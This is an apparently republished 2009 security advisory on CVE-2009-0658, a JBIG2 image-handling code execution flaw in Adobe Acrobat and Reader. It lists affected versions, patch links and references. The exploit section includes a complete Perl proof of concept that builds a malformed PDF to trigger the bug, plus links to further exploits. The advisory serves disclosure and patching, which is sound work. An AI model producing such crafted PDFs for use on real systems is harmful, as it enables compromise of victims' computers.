Home » Exploits » Adobe Acrobat and Reader PDF File Handling JBIG2 Image Remote Code Execution Vulnerability
|
|
|
Feeds -
Exploits
|
|
Written by Symantec
|
|
Tuesday, 17 March 2009 21:55 |
Adobe Acrobat and Reader PDF File Handling JBIG2 Image Remote Code Execution Vulnerability
-\\Bugtraq ID:
33751
-\\Class:
Boundary Condition Error
-\\CVE:
CVE-2009-0658
-\\Remote:
Yes
-\\Local:
No
-\\Published:
Feb 19 2009 12:00AM
-\\Updated:
Mar 17 2009 05:26PM
-\\Credit:
Symantec
-\\Vulnerable:
Nortel Networks Self-Service Speech Server 0
Nortel Networks Self-Service Peri Application 0
Nortel Networks Self-Service MPS 500 0
Nortel Networks Self-Service MPS 1000 0
Nortel Networks CallPilot 703t
Nortel Networks CallPilot 600r
Nortel Networks CallPilot 201i
Nortel Networks CallPilot 1005r
Nortel Networks CallPilot 1002rp
Adobe Acrobat Standard 8.1.3
Adobe Acrobat Standard 8.1.2
Adobe Acrobat Standard 8.1.1
Adobe Acrobat Standard 7.0.8
Adobe Acrobat Standard 7.0.7
Adobe Acrobat Standard 7.0.6
Adobe Acrobat Standard 7.0.5
Adobe Acrobat Standard 7.0.4
Adobe Acrobat Standard 7.0.3
Adobe Acrobat Standard 7.0.2
Adobe Acrobat Standard 7.0.1
Adobe Acrobat Standard 7.0
Adobe Acrobat Standard 9
Adobe Acrobat Standard 8.1
Adobe Acrobat Standard 8.0
Adobe Acrobat Standard 7.1
Adobe Acrobat Reader (UNIX) 7.0.1
Adobe Acrobat Reader (UNIX) 7.0
Adobe Acrobat Reader 8.1.3
Adobe Acrobat Reader 8.1.2
Adobe Acrobat Reader 8.1.1
Adobe Acrobat Reader 7.0.9
Adobe Acrobat Reader 7.0.9
Adobe Acrobat Reader 7.0.8
Adobe Acrobat Reader 7.0.8
Adobe Acrobat Reader 7.0.7
Adobe Acrobat Reader 7.0.6
Adobe Acrobat Reader 7.0.5
Adobe Acrobat Reader 7.0.4
Adobe Acrobat Reader 7.0.3
Adobe Acrobat Reader 7.0.2
Adobe Acrobat Reader 7.0.1
Adobe Acrobat Reader 7.0
Adobe Acrobat Reader 9
Adobe Acrobat Reader 8.1.2 Security Updat
Adobe Acrobat Reader 8.1
Adobe Acrobat Reader 8.0
Adobe Acrobat Reader 7.1
Adobe Acrobat Professional 8.1.3
Adobe Acrobat Professional 8.1.2
Adobe Acrobat Professional 8.1.1
Adobe Acrobat Professional 7.0.9
Adobe Acrobat Professional 7.0.8
Adobe Acrobat Professional 7.0.7
Adobe Acrobat Professional 7.0.6
Adobe Acrobat Professional 7.0.5
Adobe Acrobat Professional 7.0.4
Adobe Acrobat Professional 7.0.3
Adobe Acrobat Professional 7.0.2
Adobe Acrobat Professional 7.0.1
Adobe Acrobat Professional 7.0
Adobe Acrobat Professional 9
Adobe Acrobat Professional 8.1.2 Security Updat
Adobe Acrobat Professional 8.1
Adobe Acrobat Professional 8.0
Adobe Acrobat Professional 7.1
Adobe Acrobat 7.0.3
Adobe Acrobat 7.0.2
Adobe Acrobat 7.0.1
Adobe Acrobat 7.0
-\\Not Vulnerable:
Adobe Acrobat Standard 9.1
Adobe Acrobat Reader 9.1
Adobe Acrobat Professional 9.1
-\\Discussion
Adobe Acrobat and Reader are prone to a remote code-execution vulnerability.
An attacker can exploit this issue to execute arbitrary code with the privileges of the user running the application or crash the application, denying service to legitimate users.
The issue affects Reader and Acrobat 9, 8.1.3 and prior, and 7.
UPDATE (February 24, 2009): Further reports suggest that this issue affects the vulnerable applications running on Apple Mac OS X and various Linux-based operating systems.
-\\Exploit(s)/PoC(s):
Symantec captured an attempt to exploit this issue as a part of a targeted attack in the wild via 'Trojan.Pidief.E'.
A working commercial exploit is available through VUPEN Security - Exploit and PoCs Service. This exploit is not otherwise publicly available or known to be circulating in the wild.
The following commercial exploit is available for Immunity CANVAS:
https://www.immunityinc.com/downloads/immpartners/acrobat_jbig.tar.gz
The following proofs of concept are available:
============================
http://www.securityfocus.com/data/vulnerabilities/exploits/33751-poc.pdf
===============================================================
33751-PoC.pl
^^^^^^^^^^^^^
#!/usr/bin/perl
# k`sOSe 02/22/2009
# http://vrt-sourcefire.blogspot.com/2009/02/have-nice-weekend-pdf-love.html
my $size = "\x40\x00";
my $factor = "ABCD";
my $data = "A" x 8314;
print pdf();
sub pdf()
{
"%PDF-1.5\n" .
"%\xec\xf5\xf2\xe1\xe4\xef\xe3\xf5\xed\xe5\xee\xf4\n" .
"3 0 \n" .
"xref\n" .
"3 16\n" .
"0000000023 00000 n \n" .
"0000000584 00000 n \n" .
"0000000865 00000 n \n" .
"0000001035 00000 n \n" .
"0000001158 00000 n \n" .
"0000001287 00000 n \n" .
"0000001338 00000 n \n" .
"0000001384 00000 n \n" .
"0000002861 00000 n \n" .
"0000003637 00000 n \n" .
"0000005126 00000 n \n" .
"0000005173 00000 n \n" .
"0000005317 00000 n \n" .
"0000005370 00000 n \n" .
"0000005504 00000 n \n" .
"0000000714 00000 n \n" .
"trailer\n" .
"<</Root 4 0 R/Info 2 0 R/ID[<AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA> <AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>]/Size 19/Prev 10218>>\n" .
"startxref\n" .
"0\n" .
"%%EOF\n" .
" \n" .
"4 0 obj\n" .
"<</Type/Catalog/Pages 1 0 R/OCProperties<</OCGs[9 0 R 13 0 R]/D<</Order[9 0 R 13 0 R]/ON[9 0 R 13 0 R]/OFF[]>>>>>>\n" .
"endobj\n" .
" \n" .
"5 0 obj\n" .
"<</Type/Page/MediaBox[0 0 640 480]/Resources<</XObject<</Im001 7 0 R/Im002 10 0 R/Im003 11 0 R/Im004 14 0 R/Im005 16 0 R>>>>/Contents 6 0 R/Parent 1 0 R>>\n" .
"endobj\n" .
"6 0 obj\n" .
"<</Length 56/Filter/FlateDecode>>\n" .
"stream\n" .
"x\x9c\xe3*T031P\x00A\x13\x0b\x08\x9d\x9c\xab\xa0\xef\x99k``\xa8\xe0\x92\xaf\x10\xc8\x85[\x81\x11!\x05\xc6\x84\x14\x98\xc0\x14\xc0\$\@\xb4\x05\xb2\n" .
"S\xb0\n" .
"\x00J\x15#,\n" .
"endstream\n" .
"endobj\n" .
"12 0 obj\n" .
"<</Subtype/Image/Width 640/Height 480/ColorSpace/DeviceGray/BitsPerComponent 1/Decode[1 0]/Interpolate true/Length 1314/Filter/JBIG2Decode>>\n" .
"stream\n" .
"\x00\x00\x00\x01" . $size . $factor . "\x13" . $data . "endstream\n" .
"endobj\n" .
"13 0 obj\n" .
"<</Type/OCG/Name(Text Color)>>\n" .
"endobj\n" .
"14 0 obj\n" .
"<</Subtype/Image/Width 1/Height 1/ColorSpace/DeviceGray/BitsPerComponent 8/SMask 12 0 R/OC 15 0 R/Length 1>>\n" .
"stream\n" .
"\x00\n" .
"endstream\n" .
"endobj\n" .
"1 0 obj\n" .
"<</Type/Pages/Kids[5 0 R]/Count 1>>\n" .
"endobj\n" .
"xref\n" .
"0 3\n" .
"0000000000 65535 f \n" .
"0000009988 00000 n \n" .
"0000010039 00000 n \n" .
"trailer\n" .
"<</ID[<AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA> <AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>]/Size 3>>\n" .
"startxref\n" .
"104\n" .
"%%EOF\n";
}
-\\Solution
The vendor has released updates. Please see the references for more information.
Adobe Acrobat Reader 9
--Adobe AdbeRdr910_en_US_Std.exe
http://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/enu/AdbeRdr910_en_US_Std.exhttp://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/enu/AdbeRdr910_en_US_Std.exe
Adobe Acrobat Professional 9
--Adobe AcroProStdUpd910_T1T2_incr.msp
http://ardownload.adobe.com/pub/adobe/acrobat/win/9.x/9.1/misc/AcroProStdUpd910_T1T2_incr.mshttp://ardownload.adobe.com/pub/adobe/acrobat/win/9.x/9.1/misc/AcroProStdUpd910_T1T2_incr.msp
Adobe Acrobat Reader 7.1
--Adobe AdbeRdr910_en_US_Std.exe
http://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/enu/AdbeRdr910_en_US_Std.exhttp://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/enu/AdbeRdr910_en_US_Std.exe
Adobe Acrobat Reader 8.0
--Adobe AdbeRdr910_en_US_Std.exe
http://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/enu/AdbeRdr910_en_US_Std.exhttp://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/enu/AdbeRdr910_en_US_Std.exe
Adobe Acrobat Reader 8.1
--Adobe AdbeRdr910_en_US_Std.exe
http://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/enu/AdbeRdr910_en_US_Std.exhttp://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/enu/AdbeRdr910_en_US_Std.exe
Adobe Acrobat Standard 9
--Adobe AcroProStdUpd910_T1T2_incr.msp
http://ardownload.adobe.com/pub/adobe/acrobat/win/9.x/9.1/misc/AcroProStdUpd910_T1T2_incr.mshttp://ardownload.adobe.com/pub/adobe/acrobat/win/9.x/9.1/misc/AcroProStdUpd910_T1T2_incr.msp
Adobe Acrobat Reader 7.0
--Adobe AdbeRdr910_en_US_Std.exe
http://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/enu/AdbeRdr910_en_US_Std.exhttp://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/enu/AdbeRdr910_en_US_Std.exe
Adobe Acrobat Reader 7.0.1
--Adobe AdbeRdr910_en_US_Std.exe
http://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/enu/AdbeRdr910_en_US_Std.exhttp://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/enu/AdbeRdr910_en_US_Std.exe
Adobe Acrobat Reader 7.0.2
--Adobe AdbeRdr910_en_US_Std.exe
http://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/enu/AdbeRdr910_en_US_Std.exhttp://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/enu/AdbeRdr910_en_US_Std.exe
Adobe Acrobat Reader 7.0.3
--Adobe AdbeRdr910_en_US_Std.exe
http://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/enu/AdbeRdr910_en_US_Std.exhttp://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/enu/AdbeRdr910_en_US_Std.exe
Adobe Acrobat Reader 7.0.4
--Adobe AdbeRdr910_en_US_Std.exe
http://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/enu/AdbeRdr910_en_US_Std.exhttp://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/enu/AdbeRdr910_en_US_Std.exe
Adobe Acrobat Reader 7.0.5
--Adobe AdbeRdr910_en_US_Std.exe
http://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/enu/AdbeRdr910_en_US_Std.exhttp://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/enu/AdbeRdr910_en_US_Std.exe
Adobe Acrobat Reader 7.0.6
--Adobe AdbeRdr910_en_US_Std.exe
http://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/enu/AdbeRdr910_en_US_Std.exhttp://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/enu/AdbeRdr910_en_US_Std.exe
Adobe Acrobat Reader 7.0.7
--Adobe AdbeRdr910_en_US_Std.exe
http://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/enu/AdbeRdr910_en_US_Std.exhttp://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/enu/AdbeRdr910_en_US_Std.exe
Adobe Acrobat Reader 7.0.8
--Adobe AdbeRdr910_en_US_Std.exe
http://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/enu/AdbeRdr910_en_US_Std.exhttp://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/enu/AdbeRdr910_en_US_Std.exe
Adobe Acrobat Reader 7.0.9
--Adobe AdbeRdr910_en_US_Std.exe
http://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/enu/AdbeRdr910_en_US_Std.exhttp://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/enu/AdbeRdr910_en_US_Std.exe
Adobe Acrobat Reader 8.1.1
--Adobe AdbeRdr910_en_US_Std.exe
http://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/enu/AdbeRdr910_en_US_Std.exhttp://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/enu/AdbeRdr910_en_US_Std.exe
Adobe Acrobat Reader 8.1.2
--Adobe AdbeRdr910_en_US_Std.exe
http://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/enu/AdbeRdr910_en_US_Std.exhttp://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/enu/AdbeRdr910_en_US_Std.exe
Adobe Acrobat Reader 8.1.3
--Adobe AdbeRdr910_en_US_Std.exe
http://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/enu/AdbeRdr910_en_US_Std.exhttp://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/enu/AdbeRdr910_en_US_Std.exe
-\\Reference(s)
--/JBIG2Decode �??Look Mommy, No Hands!�?�
http://blog.didierstevens.com/2009/03/09/quickpost-jbig2decode-look-mommy-no-hands (Didier Stevens)
--/JBIG2Decode Trigger Trio
http://blog.didierstevens.com/2009/03/04/quickpost-jbig2decode-trigger-trio (Didier Stevens)
--Adobe Homepage
http://www.adobe.co (Adobe)
--Adobe Reader and Acrobat 9.1 update available
http://blogs.adobe.com/psirt/2009/03/_adobe_reader_and_acrobat_91_u.htm (Adobe)
--Adobe Reader and Acrobat issue
http://blogs.adobe.com/psirt/2009/02/adobe_reader_and_acrobat_issue.htm (Adobe)
--APSA09-01 - Buffer overflow issue in versions 9.0 and earlier of Adobe Reader an
http://www.adobe.com/support/security/advisories/apsa09-01.htm (Adobe)
--Nortel Response to Adobe APSA09-01 - Buffer overflow issue in v9.0 and earlier o
http://support.nortel.com/go/main.jsp?cscat=BLTNDETAIL&id=84424 (Nortel Networks)
--Security Updates available for Adobe Reader 9 and Acrobat 9
http://www.adobe.com/support/security/bulletins/apsb09-03.htm (Adobe)
--Vulnerability Note VU#905281 Adobe Reader and Acrobat memory corruption vulnerab
http://www.kb.cert.org/vuls/id/90528 (US-CERT)
|
|
|
|
